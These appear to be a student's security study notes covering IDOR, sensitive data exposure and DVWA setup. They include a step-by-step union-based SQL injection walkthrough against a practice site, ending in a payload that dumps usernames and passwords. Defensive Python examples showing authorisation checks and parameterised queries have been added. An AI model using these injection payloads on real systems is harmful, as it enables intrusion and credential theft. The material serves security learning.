- Insecure Direct Object Reference
- Sensitive Data Exposure
- DVWA set up and configuration
- Union Based SQL Injection
- _______________________________
- Insecure Direct Object Reference
- It is a vulnerability in which an attacker who is authorised for his/her own dashboard is able to gain access to some other user's account, for example:
- http://anywebsite.com/dashboard?user=someuser or id=12342
- http://anywebsite.com/dashboard?user=randomuser or id=12348
- if a hacker is able to change the parameter assigned by a website to some other parameter and gain access to the other user's account, then it is an IDOR vulnerability
- -> hacker can also change passwords
- http://anywebsite.com/changepassword?user=someuser
- why this attack occurs
- ->developers use direct references to restricted resources and the application fails to verify whether the user is authorised or not.
- ->improper check access
- --->WAVE
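The missing check described above, shown as a vulnerable handler beside a hardened one. This is an added example, not part of the original notes; the handler names, status codes and the in-memory data are assumptions, and only the URL shapes come from the notes.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample data; user names follow the URLs in the notes.
DASHBOARDS = {"someuser": "someuser's orders", "randomuser": "randomuser's orders"}
PASSWORDS = {"someuser": "old-a", "randomuser": "old-b"}


def _target(url):
    # The ?user= value is fully controlled by the client.
    return parse_qs(urlsplit(url).query).get("user", [""])[0]


def dashboard_vulnerable(session_user, url):
    # Authentication only: checks that *someone* is logged in,
    # then trusts the direct object reference in ?user=.
    if session_user is None:
        return 401, "login required"
    return 200, DASHBOARDS.get(_target(url), "")


def dashboard_hardened(session_user, url):
    if session_user is None:
        return 401, "login required"
    # Authorisation: the requested object must belong to the session user.
    if _target(url) != session_user:
        return 403, "forbidden"
    return 200, DASHBOARDS.get(session_user, "")


def change_password_hardened(session_user, new_password):
    # The target account is taken from the server-side session only;
    # no client-supplied ?user= is read at all.
    if session_user not in PASSWORDS:
        return 401, "login required"
    PASSWORDS[session_user] = new_password
    return 200, "password changed"


if __name__ == "__main__":
    url = "http://anywebsite.com/dashboard?user=randomuser"
    print(dashboard_vulnerable("someuser", url))  # other user's data is served
    print(dashboard_hardened("someuser", url))    # request is refused
```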
- ____________________________
- Sensitive Data Exposure
- Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion, at rest, or even in the customer's/user's browser
- eg 1
- An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
- eg 2
- A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
- ________________________________________
- DVWA set up and configuration
- install XAMPP
- X->cross platform
- A->Apache
- M->Mysql
- P->PHP
- P->Perl
- XAMPP-> It is a lightweight software distribution that makes it extremely easy for developers to create a local web server for testing and deployment purposes
- DVWA->Damn Vulnerable Web App
- DVWA is a vulnerable app by default; budding security students can learn to attack and patch vulnerabilities by performing attacks on this application
- ->unzip the file
- ->Copy the folder and paste in C:\xampp\htdocs
- ->open Xampp->start apache ->mysql
- ->open the pasted folder "dvwa" in this case
- ->navigate to the folder 'config'
- ->open config.php file and leave password=""(blank)
- ->open the browser and go to 127.0.0.1/dvwa
- ->click on 'click to create a database'
- __________________________________
- Union SQL Injection
- ->testphp.vulnweb.com
- -> find a parameter
- test whether it has an SQL database or not
- ->Check errors
- http://testphp.vulnweb.com/listproducts.php?cat=1
- http://testphp.vulnweb.com/listproducts.php?cat=1'
- ->Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
- ->http://testphp.vulnweb.com/listproducts.php?cat=1' order by 1--+
- ->remove '
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 7--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 10--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11--+
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--+
- -> Error: Unknown column '12' in 'order clause' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
- search art
- -->Unknown column<--
- --> now we know that we have
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11--+
- ->we get vulnerable tables
- 2,7,9
- ->version()
- ->database()
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables--+
- ->It will give us a list of table names; now we know which table to use/select
- ->>"users"
- ->now we need columns
- ->>http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,column_name,8,9,10,11 from information_schema.columns where table_name="users"--+
- ->now we know we have column names like --> uname,pass,address,email,name
- ->where can the juicy info be found?
- ->uname,pass,address
- ->so
- ->
- ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,group_concat(uname,':',pass),8,9,10,11 from users--+
- -> and we get username and password
- union-> UNION is an SQL operator; its job is to combine the results of two or more SELECT statements into a single result, which is then returned as part of the HTTP response.
- ->order by is used for sorting
- ->Select->
- A select query is a database object that shows information in Datasheet view
- what is information schema?
- ->
- Information schema is a set of structures which stores metadata and other information about tables, views, columns and procedures in a database
- The mother of the database
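Why the UNION technique in these notes works, and the fix, as an added example that is not part of the original notes. It uses Python's sqlite3 with a constructed three-column schema instead of the MySQL site in the walkthrough; the function names and sample rows are assumptions.

```python
import re
import sqlite3


def make_db():
    # Constructed sample schema; "users", "uname" and "pass" mirror the
    # names mentioned in the notes, everything else is an assumption.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 'poster', 1), (2, 'print', 2);
        INSERT INTO users VALUES ('test', 'constructed-secret');
    """)
    return db


def list_products_vulnerable(db, cat):
    # The request parameter is pasted into the SQL text, so it can change
    # the structure of the query (ORDER BY, UNION SELECT, comments, ...).
    query = "SELECT id, name, cat FROM products WHERE cat = " + cat
    return db.execute(query).fetchall()


def list_products_hardened(db, cat):
    # 1) Validate: a category id must be a plain decimal integer.
    if not re.fullmatch(r"[0-9]+", cat):
        return []  # caller shows a generic page, never the raw SQL error
    # 2) Bind: the value is sent separately from the SQL text and can
    #    never be parsed as SQL keywords.
    return db.execute(
        "SELECT id, name, cat FROM products WHERE cat = ?", (int(cat),)
    ).fetchall()


def demo():
    db = make_db()
    payload = "1 UNION SELECT 1, uname, pass FROM users"
    return {
        "vuln_normal": list_products_vulnerable(db, "1"),
        "vuln_payload": list_products_vulnerable(db, payload),
        "hard_normal": list_products_hardened(db, "1"),
        "hard_payload": list_products_hardened(db, payload),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The verbose MySQL errors quoted in the notes are a second finding: the hardened function returns an empty result for malformed input instead of surfacing the database error to the client.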